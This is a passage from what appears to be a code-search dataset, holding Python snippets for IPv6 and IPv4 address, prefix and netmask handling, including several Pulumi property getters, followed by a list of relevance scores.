"def test_ipv6_in_net(self):\n test_ip = ip_address.IPAddress(\"2001:0db8:85a3:08d3:1319:8a2e:0370:7344/24\")\n assert test_ip.in_network(\"2001:0d00::/24\")\n assert test_ip.in_network(\"2001:0d00::/29\")",
"def ipv4_connected_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv4_connected_prefix\")",
"def _rloc_ip_net_addr(self):\n self.net_addr = ':'.join(self.rloc.split(':')[:-1]) + ':'\n return self.net_addr",
"def associate_ipv6_address(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"associate_ipv6_address\")",
"def ip_address_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_address_prefix\")",
"def ipv6_addresses(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"ipv6_addresses\")",
"def ipv6_networkcontainers(view):\n return \"ipv6networkcontainer?\" \\\n \"_return_fields=\" \\\n \"extattrs,\" \\\n \"comment,\" \\\n \"network,\" \\\n \"network_view,\" \\\n \"utilization&\" \\\n \"network_view=\" + view + \\\n \"&_max_results=-25000\"",
"def c6(self):\n return self._c6",
"def get_netmask(self):\n return self.get_ipv4_netmask()",
"def format_ipv6(value, mask):\n value_ipv6 = \":\".join(re.findall('..', \"{:032x}\".format(value)))\n if mask is None:\n return value_ipv6\n value_mask = \":\".join(re.findall('..', \"{:032x}\".format(mask)))\n return \"{}/{}\".format(value_ipv6, value_mask)",
"def local_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def local_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def SupportsIPv6(self) -> bool:",
"def local_ipv4_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def _FixIPv6Address(self, netblocks):\n new_list = []\n length = len(netblocks)\n if length > 0:\n number_ipv6 = 0\n for netblock in netblocks:\n if netblock.version == 4:\n new_list.append(netblock)\n elif netblock.version == 6:\n number_ipv6 += 1\n if number_ipv6 == length:\n return True, new_list\n return False, new_list",
"def ipv4_connected_prefix(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ipv4_connected_prefix\")",
"def NumberOfMappingIPV6Ranges(self):\r\n\t\treturn self._get_attribute('numberOfMappingIPV6Ranges')",
"def get_rug_address():\n net = netaddr.IPNetwork(ULA_PREFIX)\n return str(netaddr.IPAddress(net.first + 1))",
"def prefixlen(self):\n return self._ip_range.prefixlen",
"def enable_ipv6(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_ipv6\")",
"def get_management_address(self, ensure_configuration=False):\n primary = self.get_interface(GENERIC_IFNAME + '0')\n prefix, prefix_len = ULA_PREFIX.split('/', 1)\n eui = netaddr.EUI(primary.lladdr)\n ip_str = str(eui.ipv6_link_local()).replace('fe80::', prefix[:-1])\n\n if not primary.is_up:\n self.up(primary)\n\n ip = netaddr.IPNetwork('%s/%s' % (ip_str, prefix_len))\n if ensure_configuration and ip not in primary.addresses:\n primary.addresses.append(ip)\n self.update_interface(primary)\n return ip_str",
"def ipv6(self, ipv6):\n\n self._ipv6 = ipv6",
"def assign_ipv6_address_on_creation(self) -> bool:\n return pulumi.get(self, \"assign_ipv6_address_on_creation\")",
"def reverse_prefix(self):\n if self.type == ZONE_REVERSE_IPV4:\n # Get IPv4 prefix covering reverse zone\n n = self.name.lower()\n if n.endswith(\".in-addr.arpa\"):\n r = n[:-13].split(\".\")\n r.reverse()\n length = 4 - len(r)\n r += [\"0\"] * length\n ml = 32 - 8 * length\n return \".\".join(r) + \"/%d\" % ml\n elif self.type == ZONE_REVERSE_IPV6:\n # Get IPv6 prefix covering reverse zone\n n = self.name.lower()\n if n.endswith(\".ip6.int\"):\n n = n[:-8]\n elif n.endswith(\".ip6.arpa\"):\n n = n[:-9]\n else:\n raise Exception(\"Invalid IPv6 zone suffix\")\n p = n.split(\".\")\n p.reverse()\n length = len(p)\n if length % 4:\n p += [\"0\"] * (4 - length % 4)\n r = \"\"\n for i, c in enumerate(p):\n if i and i % 4 == 0:\n r += \":\"\n r += c\n if len(p) != 32:\n r += \"::\"\n prefix = r + \"/%d\" % (length * 4)\n return IPv6(prefix).normalized.prefix",
"def ipv4_to_ipv6(v6_network: Union[str, ipaddress.IPv6Network], v4_address: Union[str, ipaddress.IPv4Interface]):\n if isinstance(v6_network, str):\n v6_network = ipaddress.IPv6Network(v6_network)\n if isinstance(v4_address, str):\n v4_address = ipaddress.IPv4Address(v4_address)\n\n v6_address = v6_network[int(v4_address)]\n return ipaddress.IPv6Interface(f\"{v6_address}/{v6_network.prefixlen}\")",
"def ipv6_cmd(args):\n r = requete(\"Devices:get\")\n for i in r['status']:\n a = \"-\"\n if 'IPv6Address' in i:\n for j in i['IPv6Address']:\n if j['Scope'] != 'link':\n a = j['Address']\n b = \"-\"\n if 'IPAddress' in i: b = i['IPAddress']\n if a == \"-\": continue\n print(\"%4s %-32s %-5s %-16s %s\" % (i['Index'], i['Name'], i['Active'], b, a))",
"def OSSupportsIPv6(self) -> bool:",
"def ipv4(self):\n return Network(private=True).ipv4",
"def local_address(self) -> T_SockAddr:\n from anyio._core._sockets import convert_ipv6_sockaddr\n return convert_ipv6_sockaddr(self.raw_socket.getsockname())",
"def get_netmask(self):\n return self.get_ip_network().netmask",
"def is_net_ip6(value):\n for test in [lambda x: ipaddress.IPv6Network(x)._prefixlen != 128,\n lambda x: ipaddress.IPv6Interface(x)._prefixlen != 128]:\n try:\n return bool(test(value))\n\n except:\n pass\n\n return False",
"def filter_netmask(prefix):\n try:\n prefix_str = unicode(prefix)\n except NameError as ex:\n prefix_str = str(prefix)\n return IPv4Network(\"1.0.0.0/\"+prefix_str).netmask",
"def get_appgw_subnet_cidr(self) -> Union[str, None]:\n # determine the value of constants\n addon_consts = self.get_addon_consts()\n CONST_INGRESS_APPGW_ADDON_NAME = addon_consts.get(\"CONST_INGRESS_APPGW_ADDON_NAME\")\n CONST_INGRESS_APPGW_SUBNET_CIDR = addon_consts.get(\"CONST_INGRESS_APPGW_SUBNET_CIDR\")\n\n # read the original value passed by the command\n appgw_subnet_cidr = self.raw_param.get(\"appgw_subnet_cidr\")\n # try to read the property value corresponding to the parameter from the `mc` object\n if (\n self.mc and\n self.mc.addon_profiles and\n CONST_INGRESS_APPGW_ADDON_NAME in self.mc.addon_profiles and\n self.mc.addon_profiles.get(\n CONST_INGRESS_APPGW_ADDON_NAME\n ).config.get(CONST_INGRESS_APPGW_SUBNET_CIDR) is not None\n ):\n appgw_subnet_cidr = self.mc.addon_profiles.get(\n CONST_INGRESS_APPGW_ADDON_NAME\n ).config.get(CONST_INGRESS_APPGW_SUBNET_CIDR)\n\n # this parameter does not need dynamic completion\n # this parameter does not need validation\n return appgw_subnet_cidr",
"def name(self):\n return 'Destination Options for IPv6'",
"def __init__(self, address, netmask=None):\n\n if netmask:\n ip = Ipv6Address(address)\n address = \"%s/%s\" % (ip,netmask)\n\n google.ipaddr.IPv6Network.__init__(self, address, strict=False)",
"def ip6_cidr_range(ingress, debug=False):\n if debug:\n print('ip6_cidr_range ' + str(ingress) + lineno())\n print('type: ' + str(type(ingress)) + lineno())\n if hasattr(ingress, '__dict__'):\n print('vars: ' + str(vars(ingress)) + lineno())\n\n suffix = \"/128\";\n\n if type(ingress) == type(dict()):\n\n if debug:\n print('ingress is a dict: ' + lineno())\n\n if 'CidrIp' in ingress:\n\n if debug:\n print('CiderIp in ingress '+lineno())\n\n if type(ingress['CidrIp']) == type(str()):\n\n if debug:\n print('ip is: ' + str(ingress['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress['CidrIp']:\n return True\n\n elif ingress['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif sys.version_info[0] < 3 and type(ingress['CidrIp']) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(ingress['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress['CidrIp']:\n return True\n\n elif ingress['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif type(ingress) == type(list()):\n\n for item in ingress:\n if 'CidrIp' in item:\n if type(item['CidrIp']) == type(str()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n if sys.version_info[0] < 3 and type(item['CidrIp']) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif hasattr(ingress, 'cidrIpv6'):\n\n if type(ingress.cidrIpv6) == type(str()):\n\n if debug:\n print('ip is: ' + str(ingress.cidrIpv6) + lineno())\n\n if type(ingress.cidrIpv6) == type(list()):\n\n for item in ingress:\n if 'CidrIp' in item:\n if type(item['CidrIp']) == type(str()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n if sys.version_info[0] < 3:\n if type(item['CidrIp']) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. 
if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif type(ingress.cidrIpv6) == type(dict()):\n\n for item in ingress.cidrIp:\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6[item]:\n return True\n\n elif ingress.cidrIpv6[item].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n elif type(ingress.cidrIpv6) == type(str()):\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6:\n return False\n\n elif ingress.cidrIpv6.endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif sys.version_info[0] < 3 and type(ingress.cidrIpv6) == type(unicode()):\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6:\n return False\n\n elif ingress.cidrIpv6.endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n else:\n print('not sure what this is')\n print('need to fix')\n sys.exit(1)\n\n elif sys.version_info[0] < 3 and type(ingress.cidrIpv6) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(ingress.cidrIpv6) + lineno())\n\n if type(ingress.cidrIpv6) == type(list()):\n\n for item in ingress:\n if 'CidrIp' in item:\n if type(item['CidrIp']) == type(str()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n if sys.version_info[0] < 3:\n if type(item['CidrIp']) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif type(ingress.cidrIpv6) == type(dict()):\n\n for item in ingress.cidrIp:\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6[item]:\n return True\n\n elif ingress.cidrIpv6[item].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n elif type(ingress.cidrIpv6) == type(str()):\n\n # only care about literals. 
if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6:\n return False\n\n elif ingress.cidrIpv6.endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif sys.version_info[0] < 3 and type(ingress.cidrIpv6) == type(unicode()):\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6:\n return False\n\n elif ingress.cidrIpv6.endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n else:\n print('not sure what this is')\n print('need to fix')\n sys.exit(1)\n\n else:\n if debug:\n print('ip is: ' + str(ingress.cidrIpv6) + lineno())\n print('type: ' + str(type(ingress.cidrIpv6)) + lineno())\n\n if type(ingress.cidrIpv6) == type(list()):\n\n has_invalid_cidr = False\n\n for item in ingress.cidrIpv6:\n\n if debug:\n print('list item: ' + str(item) + lineno())\n\n if type(item) == type(dict()):\n\n for item2 in item:\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item[item2]:\n return True\n\n elif item2 == 'Ref':\n return True\n\n elif item[item2].endswith(suffix):\n if debug:\n print('ip ends with /32' + lineno())\n return True\n\n else:\n if debug:\n print('ip does not end with /32' + lineno())\n return False\n\n elif 'CidrIp' in item:\n if type(item['CidrIp']) == type(str()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n has_invalid_cidr = True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n has_invalid_cidr = False\n\n if sys.version_info[0] < 3:\n if type(item['CidrIp']) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n has_invalid_cidr = True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n has_invalid_cidr = False\n\n return has_invalid_cidr\n\n else:\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6:\n return True\n\n elif ingress.cidrIpv6.endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif type(ingress) == type(str()):\n if debug:\n print('is a str ' + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress:\n return True\n\n elif ingress.endswith('/128'):\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n elif sys.version_info[0] < 3 and type(ingress) == type(unicode()):\n if debug:\n print('is a str ' + lineno())\n\n # only care about literals. 
if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress:\n return True\n\n elif ingress.endswith('/128'):\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n return False",
"def get_mask_ipv6(bits):\n\n if bits > 128 or bits < 0:\n raise ValueError('A mask can only be 0-128 bits, got %i' % bits)\n elif bits == 128:\n return FULL_IPv6_MASK\n\n # get the binary representation of the mask\n mask_bin = _get_binary(2 ** bits - 1, 128)[::-1]\n\n # breaks it into sixteen character groupings\n groupings = [mask_bin[16 * i:16 * (i + 1)] for i in range(8)]\n\n # converts each group into its hex value\n return ':'.join(['%04x' % int(group, 2) for group in groupings]).upper()",
"def cidr(self):\n return self._cidr",
"def NoOfAddressPrefix(self):\n return self._get_attribute('noOfAddressPrefix')",
"def find_ipv6():\n\n test_host = '2600::' # Sprint.net\n try:\n with socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) as s:\n s.connect((test_host, 53))\n ipv6 = s.getsockname()[0]\n except:\n if cfg['debug']:\n print(\"Couldn't create a socket to %s\" % test_host)\n print(\"Check that you have a valid IPv6 default route\")\n ipv6 = None\n\n return ipv6",
"def network(self):\n address = unicode(\"%s/%s\" % (self.address, _get_cidr(self.netmask)))\n return IPv4Network(address, strict=False)",
"def allocation_min_netmask_length(self) -> pulumi.Output[Optional[int]]:\n return pulumi.get(self, \"allocation_min_netmask_length\")",
"def get_ipv6_host(self, host):\n\n try:\n host = u'{0}'.format(host)\n return IPv6Network(host, strict=False)\n except ValueError as e:\n error_msg = \"Given host {0} is an invalid IPv6 format -- \" \\\n \"error {1}\".format(host, str(e))\n LOG.error(error_msg)\n self.module.fail_json(msg=error_msg)",
"def ipv6_native(self) -> bool:\n return pulumi.get(self, \"ipv6_native\")",
"def remote_ip_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ip_prefix\")",
"def remote_ip_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ip_prefix\")",
"def update_gateway_with_prefixlen(self, ipv4='', ipv4_prefixlen=0, \n ipv6='', ipv6_prefixlen=0, port_no=''):\n port = self.ports[port_no]\n\n if port.gateway is None:\n port.gateway = Gateway(name=port.name, port_no=port.port_no,\n ipv4=ipv4, ipv4_prefixlen=ipv4_prefixlen,\n ipv6=ipv6, ipv6_prefixlen=ipv6_prefixlen)\n else:\n port.gateway.name = port.name\n port.gateway.ipv4 = netaddr.IPAddress(ipv4)\n port.gateway.ipv4_subnet = netaddr.IPNetwork(ipv4 + '/' + str(ipv4_prefixlen))\n port.gateway.ipv6 = netaddr.IPAddress(ipv6)\n port.gateway.ipv6_subnet = netaddr.IPNetwork(ipv6 + '/' + str(ipv6_prefixlen))\n port.gateway.port_no = port.port_no\n\n self.tbl.update_entry(subnet=port.gateway.ipv4_subnet, receive_port=port, metric=0, source=\"CONNECTED\")",
"def alias(self):\n return 'IPv6-Opts'",
"def get_if_addr6(iff):\n return next((x[0] for x in in6_getifaddr()\n if x[2] == iff and x[1] == IPV6_ADDR_GLOBAL), None)",
"def ipv6_access_type(self) -> Optional[pulumi.Input['IPAllocationPolicyIpv6AccessType']]:\n return pulumi.get(self, \"ipv6_access_type\")",
"def allocation_min_netmask_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"allocation_min_netmask_length\")",
"def allocation_min_netmask_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"allocation_min_netmask_length\")",
"def is_ipv6(cluster_config):\n cluster = load_cluster_config_json(cluster_config)\n return cluster[\"environment\"][\"ipv6_enabled\"]",
"def network(ip):\n ip, prefix = netParse(ip)\n return \"{}/{}\".format(\n ipStr(ip & (0xffffffff << (32 - prefix))),\n prefix\n )",
"def subnetting(self):\n ip = netaddr.IPNetwork(addr=self.subnet)\n subnets = list(ip.subnet(prefixlen=24))\n list_subnets = [str(subnet) for subnet in subnets]\n return list_subnets",
"def cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cidr\")"
] | [
"0.7729275",
"0.76980174",
"0.76423615",
"0.76423615",
"0.74332094",
"0.6983688",
"0.6952086",
"0.69470865",
"0.6910834",
"0.6910834",
"0.6771784",
"0.65345484",
"0.6393636",
"0.6392489",
"0.634702",
"0.6326751",
"0.6292675",
"0.6250887",
"0.62504554",
"0.6245007",
"0.6242389",
"0.62111634",
"0.61639744",
"0.6129926",
"0.61279005",
"0.6124118",
"0.6123404",
"0.6011149",
"0.6000404",
"0.59922934",
"0.5961852",
"0.59380776",
"0.59224266",
"0.5904247",
"0.58965254",
"0.5884845",
"0.5841586",
"0.5811044",
"0.57858795",
"0.57753503",
"0.57629985",
"0.57561666",
"0.5749286",
"0.57438874",
"0.572851",
"0.5718094",
"0.57133394",
"0.57131594",
"0.570418",
"0.5700854",
"0.5697253",
"0.5693369",
"0.56607217",
"0.56362534",
"0.5634834",
"0.5634834",
"0.56252795",
"0.5624694",
"0.5611572",
"0.5611493",
"0.5585948",
"0.55839694",
"0.55762595",
"0.557162",
"0.55490845",
"0.55462766",
"0.5541481",
"0.55411285",
"0.5517764",
"0.55050266",
"0.5475352",
"0.54672366",
"0.54544413",
"0.5450409",
"0.54385674",
"0.54139763",
"0.54112065",
"0.53973544",
"0.5391061",
"0.5383078",
"0.5383049",
"0.5382081",
"0.5379691",
"0.53760344",
"0.5375599",
"0.5375143",
"0.53591913",
"0.53409517",
"0.5304832",
"0.5304832",
"0.5301838",
"0.5299387",
"0.52880913",
"0.52783364",
"0.52632976",
"0.52632976",
"0.5260236",
"0.5252007",
"0.5245292",
"0.52389383"
] | 0.7312516 | 5 |
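A minimal sketch, assuming only the standard-library ipaddress module, of how an IPv6 prefix (CIDR) string such as the ipv6_connected_prefix value in the row above could be validated and normalized. This is an illustration added for readability, not part of the dataset; the function name and sample prefix are assumptions.

import ipaddress

def validate_ipv6_prefix(prefix: str) -> str:
    # Raises ValueError for anything that is not a valid IPv6 network;
    # strict=False tolerates host bits being set in the supplied address.
    network = ipaddress.IPv6Network(prefix, strict=False)
    return str(network)

# Illustrative usage: validate_ipv6_prefix("2001:db8::/48") returns "2001:db8::/48"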
The resource ID of the Network Fabric l3IsolationDomain. | def l3_isolation_domain_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "l3_isolation_domain_id") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def l3_isolation_domain_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"l3_isolation_domain_id\")",
"def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")",
"def external_network_id(self) -> str:\n return pulumi.get(self, \"external_network_id\")",
"def id(self):\n return self._domain.id",
"def domain_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"domain_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def dns_zone_resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"dns_zone_resource_id\")",
"def domain_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"domain_id\")",
"def domain_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"domain_id\")",
"def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_pool_id(self) -> str:\n return pulumi.get(self, \"resource_pool_id\")",
"def failover_group_id(self) -> str:\n return pulumi.get(self, \"failover_group_id\")",
"def resource_id(self) -> Optional[str]:\n return pulumi.get(self, \"resource_id\")",
"def custom_compliance_domain_id(self):\n return self._custom_compliance_domain_id",
"def unique_id(self):\n return self._light.address",
"def get_keystone_v3_domain_id(self, domain_name):\n LOG_OBJ.debug(\"Get the domain ID.\")\n\n _url = \"http://\" + self.host_ip + \":35357/v3/domains?name=\" + \\\n str(domain_name)\n _headers = {'x-auth-token': self.cloud_admin_info[\"token_domain\"],\n 'content-type': 'application/json'}\n _body = None\n\n response = self.request(\"GET\", _url, _headers, _body)\n\n if response is None:\n LOG_OBJ.error(\"No response from Server while getting the \"\n \"ID of domain\")\n print (\"No response from Server while getting the \"\n \"ID of domain\")\n return response\n\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\"Get domain ID Failed with status %s and error \"\n \": %s\" % (response.status, response.data))\n print (\"Get domain ID Failed with status %s and error : %s\" %\n (response.status, response.data))\n return response.status\n\n output = json.loads(response.data)\n LOG_OBJ.info(\"Domain details : %s \" % output)\n if len(output['domains']) != 1:\n LOG_OBJ.debug(\"No. of domains with name %s is %s\"\n % (domain_name, len(output['domains'])))\n print(\"No. of domains with name %s is %s\"\n % (domain_name, len(output['domains'])))\n return\n\n return output['domains'][0]['id']",
"def resource_group_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def vulnerability_resilience_id():\n\n if S3VulnerabilityModel.resilience_pid is None:\n # Get the parameter_id of the aggregated_indicator\n db = current.db\n table = db.vulnerability_aggregated_indicator\n row = db(table.uuid == \"Resilience\").select(table.parameter_id,\n limitby=(0, 1)).first()\n try:\n S3VulnerabilityModel.resilience_pid = row.parameter_id\n except:\n # DB not initialised\n pass\n\n return S3VulnerabilityModel.resilience_pid",
"def external_id(self) -> str:\n return self._search_in_properties(ATTR_GUID)",
"def managed_rule_identifier(self) -> str:\n return pulumi.get(self, \"managed_rule_identifier\")",
"def managed_rule_identifier(self) -> str:\n return pulumi.get(self, \"managed_rule_identifier\")",
"def resource_group_id(self) -> Optional[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def external_id(self):\n return self._external_id",
"def external_id(self):\n return self._external_id",
"def data_center_id(self) -> str:\n return pulumi.get(self, \"data_center_id\")",
"def data_center_id(self) -> str:\n return pulumi.get(self, \"data_center_id\")",
"def unique_id(self):\n return self.config_entry.entry_id + \"lsa\"",
"def hydrofabric_data_id(self) -> str:\n return self._hydrofabric_data_id",
"def unique_identifier(self) -> str:\n return pulumi.get(self, \"unique_identifier\")",
"def unique_id(self):\n return f\"c{self._zone.controller_index + 1}_z{self._zone.zone_index + 1}\"",
"def unique_id(self):\n return f\"bhyve:program:{self._program_id}\"",
"def internal_id(self) -> str:\n return pulumi.get(self, \"internal_id\")",
"def security_group_id_for_domain_boundary(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"security_group_id_for_domain_boundary\")",
"def storage_account_resource_id(self) -> Optional[str]:\n return pulumi.get(self, \"storage_account_resource_id\")",
"def id(self):\n return self.raw_resource.uuid",
"def establish_id(self):\n if self.config.node_id is None:\n self.config.node_id = str(uuid4()).replace('-', '')\n return self.config.node_id",
"def dataset_id(self) -> str:\n return pulumi.get(self, \"dataset_id\")",
"def dataset_id(self) -> str:\n return pulumi.get(self, \"dataset_id\")",
"def dataset_id(self) -> str:\n return pulumi.get(self, \"dataset_id\")",
"def unique_id(self):\n return self.config_entry.entry_id + \"nls\"",
